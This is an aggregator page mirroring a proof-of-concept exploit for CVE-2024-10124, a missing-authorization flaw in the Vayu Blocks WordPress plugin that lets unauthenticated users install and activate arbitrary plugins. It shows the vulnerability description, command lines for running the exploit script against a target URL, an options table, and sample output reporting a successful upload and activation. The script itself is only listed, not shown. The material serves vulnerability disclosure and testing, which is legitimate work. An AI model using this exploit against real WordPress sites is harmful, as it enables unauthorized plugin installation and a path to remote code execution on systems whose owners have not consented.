CVE-2024-10124 PoC — Vayu Blocks – Gutenberg Blocks for WordPress & WooCommerce <= 1.1.1 - Missing Authorization to Unauthenticated Arbitrary

Source

https://github.com/Nxploited/CVE-2024-10124-Poc

Associated Vulnerability

Title:Vayu Blocks – Gutenberg Blocks for WordPress & WooCommerce <= 1.1.1 - Missing Authorization to Unauthenticated Arbitrary Plugin Installation/Activation (CVE-2024-10124)
Description:The Vayu Blocks – Gutenberg Blocks for WordPress & WooCommerce plugin for WordPress is vulnerable to unauthorized arbitrary plugin installation and activation due to a missing capability check on the tp_install() function in all versions up to, and including, 1.1.1. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins which can be leveraged to achieve remote code execution if another vulnerable plugin is installed and activated. This vulnerability was partially patched in version 1.1.1.

Readme

# CVE-2024-10124-Poc
The Vayu Blocks – Gutenberg Blocks for WordPress & WooCommerce plugin for WordPress is vulnerable to unauthorized arbitrary plugin installation and activation due to a missing capability check on the tp_install() function in all versions up to, and including, 1.1.1. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins which can be leveraged to achieve remote code execution if another vulnerable plugin is installed and activated. This vulnerability was partially patched in version 1.1.1.

# Example Scenarios

### Check Vulnerability
```
python CVE-2024-10124.py -u http://192.168.100.74/wordpress --check-version

```
This will check the version of the vayu-blocks plugin to determine if the site is vulnerable.

### Install a Plugin (Default)
```
python CVE-2024-10124.py -u http://192.168.100.74/wordpress

```
This will install the default plugin hello-dolly

### Install a Specific Plugin
```
python CVE-2024-10124.py -u http://192.168.100.74/wordpress -p plugin_name

```
This will install the plugin_name plugin on the target site.


| 🔍 | **Command**              | **Description**                                     | **Example**                           |
|----|--------------------------|---------------------------------------------------|---------------------------------------|
| 🌐 | `-u` or `--url`          | Specify the target URL for the WordPress site.     | `-u http://192.168.100.74/wordpress`        |
| 🔒 | `--check-version`        | Check if the site is vulnerable based on version. | `-u http://192.168.100.74/wordpress --check-version` |
| ⚙️ | `-p` or `--plugin`       | Specify the plugin name (default is hello-dolly).  | `-u http://192.168.100.74/wordpress -p plugin_name` |



```
options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target URL (e.g., http://192.168.100.74/wordpress)
  -p PLUGIN, --plugin PLUGIN
                        Plugin name (default: hello-dolly)
  --check-version       Check if the site is vulnerable based on plugin version
```

# Output
```
Response Status Code: 200
The plugin has been successfully uploaded and activated.
Response Content: "http:\/\/192.168.100.74\/wordpress"

```

# Note:
This script is provided for educational purposes only. The author is not responsible for any damages caused by the misuse of this script.

File Snapshot


 [4.0K]  /data/pocs/c82bf2af8b04ef7e11d85e06b49a5ed1ce969dc4
├── [3.5K]  CVE-2024-10124.py
└── [2.4K]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!